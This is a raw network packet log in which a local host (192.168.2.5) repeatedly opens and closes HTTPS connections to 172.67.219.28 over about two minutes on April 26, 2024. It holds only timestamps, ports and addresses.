                                                                                                Apr 26, 2024 23:17:42.895335913 CEST44349754172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:17:43.159796000 CEST44349754172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:17:43.159858942 CEST49754443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:17:43.160375118 CEST49754443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:17:43.160383940 CEST44349754172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:17:43.162178040 CEST49754443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:17:43.162184000 CEST44349754172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:17:47.120251894 CEST44349754172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:17:47.120304108 CEST49754443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:17:47.120315075 CEST44349754172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:17:47.120371103 CEST49754443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:17:47.120376110 CEST44349754172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:17:47.120384932 CEST44349754172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:17:47.120409966 CEST49754443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:17:47.120431900 CEST49754443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:17:47.120462894 CEST49754443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:17:47.120477915 CEST44349754172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:17:47.272649050 CEST49755443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:17:47.272686005 CEST44349755172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:17:47.272738934 CEST49755443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:17:47.273118019 CEST49755443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:17:47.273132086 CEST44349755172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:17:47.535543919 CEST44349755172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:17:47.535610914 CEST49755443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:17:47.535970926 CEST49755443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:17:47.535978079 CEST44349755172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:17:47.537632942 CEST49755443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:17:47.537637949 CEST44349755172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:17:51.138483047 CEST44349755172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:17:51.138562918 CEST49755443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:17:51.138595104 CEST44349755172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:17:51.138638973 CEST49755443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:17:51.138644934 CEST44349755172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:17:51.138699055 CEST49755443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:17:51.138703108 CEST44349755172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:17:51.138744116 CEST49755443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:17:51.138765097 CEST44349755172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:17:51.138833046 CEST49755443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:17:51.138833046 CEST49755443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:17:51.147382021 CEST49756443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:17:51.147414923 CEST44349756172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:17:51.147559881 CEST49756443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:17:51.147739887 CEST49756443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:17:51.147749901 CEST44349756172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:17:51.418452024 CEST44349756172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:17:51.418530941 CEST49756443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:17:51.419006109 CEST49756443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:17:51.419013977 CEST44349756172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:17:51.420819044 CEST49756443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:17:51.420824051 CEST44349756172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:17:51.420888901 CEST49756443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:17:51.420903921 CEST44349756172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:17:51.435920954 CEST49755443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:17:51.435962915 CEST44349755172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:01.171680927 CEST44349756172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:01.171777010 CEST44349756172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:01.171818018 CEST49756443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:01.172074080 CEST49756443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:01.172308922 CEST49756443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:01.172323942 CEST44349756172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:01.223186970 CEST49757443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:01.223274946 CEST44349757172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:01.223460913 CEST49757443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:01.223742962 CEST49757443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:01.223778963 CEST44349757172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:01.507668972 CEST44349757172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:01.511707067 CEST49757443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:01.511707067 CEST49757443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:01.511760950 CEST44349757172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:01.515175104 CEST49757443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:01.515188932 CEST44349757172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:05.292555094 CEST44349757172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:05.292673111 CEST44349757172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:05.292898893 CEST49757443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:05.293212891 CEST49757443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:05.293234110 CEST44349757172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:05.355159998 CEST49758443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:05.355205059 CEST44349758172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:05.359280109 CEST49758443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:05.359659910 CEST49758443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:05.359674931 CEST44349758172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:05.641576052 CEST44349758172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:05.643223047 CEST49758443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:05.644958019 CEST49758443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:05.644958019 CEST49758443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:05.644969940 CEST44349758172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:05.644984961 CEST44349758172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:13.158704042 CEST44349758172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:13.159015894 CEST44349758172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:13.163327932 CEST49758443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:13.165184021 CEST49758443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:13.165203094 CEST44349758172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:13.240055084 CEST49759443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:13.240084887 CEST44349759172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:13.241622925 CEST49759443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:13.241853952 CEST49759443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:13.241863966 CEST44349759172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:13.507330894 CEST44349759172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:13.507658005 CEST49759443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:13.509330034 CEST49759443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:13.509330034 CEST49759443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:13.509336948 CEST44349759172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:13.509351969 CEST44349759172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:18.864036083 CEST44349759172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:18.864209890 CEST44349759172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:18.865523100 CEST49759443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:18.865652084 CEST49759443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:18.865673065 CEST44349759172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:18.945317030 CEST49760443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:18.945368052 CEST44349760172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:18.949299097 CEST49760443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:18.953449011 CEST49760443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:18.953484058 CEST44349760172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:19.214445114 CEST44349760172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:19.214837074 CEST49760443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:19.215320110 CEST49760443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:19.215328932 CEST44349760172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:19.217575073 CEST49760443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:19.217580080 CEST44349760172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:23.559106112 CEST44349760172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:23.559235096 CEST49760443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:23.559238911 CEST44349760172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:23.563270092 CEST49760443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:23.563270092 CEST49760443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:23.630408049 CEST49761443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:23.630453110 CEST44349761172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:23.630601883 CEST49761443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:23.631212950 CEST49761443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:23.631230116 CEST44349761172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:23.873436928 CEST49760443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:23.873471022 CEST44349760172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:23.889079094 CEST44349761172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:23.889156103 CEST49761443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:23.889961958 CEST49761443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:23.889985085 CEST44349761172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:23.892504930 CEST49761443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:23.892529011 CEST44349761172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:31.118513107 CEST44349761172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:31.118629932 CEST44349761172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:31.119507074 CEST49761443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:31.119507074 CEST49761443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:31.243175983 CEST49762443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:31.243210077 CEST44349762172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:31.247320890 CEST49762443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:31.251173973 CEST49762443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:31.251189947 CEST44349762172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:31.423188925 CEST49761443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:31.423213005 CEST44349761172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:31.509010077 CEST44349762172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:31.509221077 CEST49762443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:31.509586096 CEST49762443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:31.509593964 CEST44349762172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:31.511178970 CEST49762443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:31.511183977 CEST44349762172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:35.178930998 CEST44349762172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:35.179075003 CEST44349762172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:35.179236889 CEST49762443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:35.179533958 CEST49762443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:35.179554939 CEST44349762172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:35.259159088 CEST49763443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:35.259195089 CEST44349763172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:35.259529114 CEST49763443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:35.263219118 CEST49763443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:35.263231039 CEST44349763172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:35.523216009 CEST44349763172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:35.525752068 CEST49763443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:35.525752068 CEST49763443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:35.525779963 CEST44349763172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:35.529191971 CEST49763443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:35.529197931 CEST44349763172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:40.357682943 CEST44349763172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:40.357743979 CEST49763443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:40.357769966 CEST44349763172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:40.357796907 CEST44349763172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:40.357810974 CEST49763443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:40.357834101 CEST49763443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:40.358118057 CEST49763443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:40.358139038 CEST44349763172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:40.429405928 CEST49764443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:40.429442883 CEST44349764172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:40.429548025 CEST49764443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:40.429722071 CEST49764443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:40.429744959 CEST44349764172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:40.688874960 CEST44349764172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:40.688997030 CEST49764443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:40.689519882 CEST49764443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:40.689524889 CEST44349764172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:40.691298962 CEST49764443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:40.691303968 CEST44349764172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:45.895091057 CEST44349764172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:45.895164013 CEST49764443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:45.895179987 CEST44349764172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:45.895204067 CEST44349764172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:45.895214081 CEST49764443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:45.895241976 CEST49764443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:45.895430088 CEST49764443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:45.895452023 CEST44349764172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:45.977842093 CEST49765443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:45.977895975 CEST44349765172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:45.977960110 CEST49765443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:45.978292942 CEST49765443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:45.978313923 CEST44349765172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:46.237807989 CEST44349765172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:46.237880945 CEST49765443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:46.238416910 CEST49765443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:46.238428116 CEST44349765172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:46.240293980 CEST49765443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:46.240309954 CEST44349765172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:50.364739895 CEST44349765172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:50.364819050 CEST49765443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:50.364860058 CEST44349765172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:50.364885092 CEST44349765172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:50.364913940 CEST49765443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:50.364939928 CEST49765443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:50.365078926 CEST49765443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:50.365113974 CEST44349765172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:50.432460070 CEST49766443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:50.432502031 CEST44349766172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:50.432575941 CEST49766443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:50.432820082 CEST49766443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:50.432833910 CEST44349766172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:50.701354980 CEST44349766172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:50.701431990 CEST49766443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:50.701934099 CEST49766443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:50.701944113 CEST44349766172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:50.703669071 CEST49766443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:50.703675032 CEST44349766172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:54.423525095 CEST44349766172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:54.423644066 CEST49766443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:54.423681021 CEST44349766172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:54.423764944 CEST49766443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:54.423774004 CEST44349766172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:54.423794985 CEST44349766172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:54.423830032 CEST49766443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:54.423862934 CEST49766443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:54.424015045 CEST49766443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:54.424035072 CEST44349766172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:54.477875948 CEST49767443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:54.477919102 CEST44349767172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:54.477994919 CEST49767443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:54.478344917 CEST49767443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:54.478367090 CEST44349767172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:54.744961977 CEST44349767172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:54.745059013 CEST49767443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:54.745596886 CEST49767443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:54.745609045 CEST44349767172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:18:54.747195959 CEST49767443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:18:54.747204065 CEST44349767172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:19:00.307717085 CEST44349767172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:19:00.307796001 CEST49767443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:19:00.307831049 CEST44349767172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:19:00.307883024 CEST49767443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:19:00.307893991 CEST44349767172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:19:00.307940006 CEST49767443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:19:00.307948112 CEST44349767172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:19:00.307991028 CEST49767443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:19:00.308021069 CEST44349767172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:19:00.308072090 CEST49767443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:19:00.308192015 CEST49767443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:19:00.308218956 CEST44349767172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:19:00.383820057 CEST49768443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:19:00.383912086 CEST44349768172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:19:00.384036064 CEST49768443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:19:00.384320974 CEST49768443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:19:00.384357929 CEST44349768172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:19:00.645453930 CEST44349768172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:19:00.645529985 CEST49768443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:19:00.646162987 CEST49768443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:19:00.646172047 CEST44349768172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:19:00.648027897 CEST49768443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:19:00.648036957 CEST44349768172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:19:04.325370073 CEST44349768172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:19:04.325459003 CEST49768443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:19:04.325491905 CEST44349768172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:19:04.325541973 CEST49768443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:19:04.325568914 CEST44349768172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:19:04.325633049 CEST49768443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:19:04.325639963 CEST44349768172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:19:04.325690031 CEST49768443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:19:04.325746059 CEST44349768172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:19:04.325800896 CEST49768443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:19:04.325912952 CEST49768443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:19:04.325928926 CEST44349768172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:19:04.393408060 CEST49769443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:19:04.393434048 CEST44349769172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:19:04.393520117 CEST49769443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:19:04.393866062 CEST49769443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:19:04.393882990 CEST44349769172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:19:04.660197973 CEST44349769172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:19:04.660271883 CEST49769443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:19:04.660881042 CEST49769443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:19:04.660891056 CEST44349769172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:19:04.662507057 CEST49769443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:19:04.662513971 CEST44349769172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:19:08.937593937 CEST44349769172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:19:08.937691927 CEST44349769172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:19:08.937809944 CEST49769443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:19:08.939770937 CEST49769443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:19:08.939793110 CEST44349769172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:19:08.994808912 CEST49770443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:19:08.994843960 CEST44349770172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:19:08.995125055 CEST49770443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:19:08.997232914 CEST49770443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:19:08.997246981 CEST44349770172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:19:09.265427113 CEST44349770172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:19:09.265552044 CEST49770443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:19:09.266050100 CEST49770443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:19:09.266067982 CEST44349770172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:19:09.269635916 CEST49770443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:19:09.269649982 CEST44349770172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:19:14.374459982 CEST44349770172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:19:14.374614954 CEST49770443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:19:14.374645948 CEST44349770172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:19:14.374702930 CEST49770443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:19:14.374711990 CEST44349770172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:19:14.374754906 CEST49770443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:19:14.374774933 CEST44349770172.67.219.28192.168.2.5
                                                                                                Apr 26, 2024 23:19:14.374830961 CEST49770443192.168.2.5172.67.219.28
                                                                                                Apr 26, 2024 23:19:14.375015974 CEST49770443192.168.2.5172.67.219.28
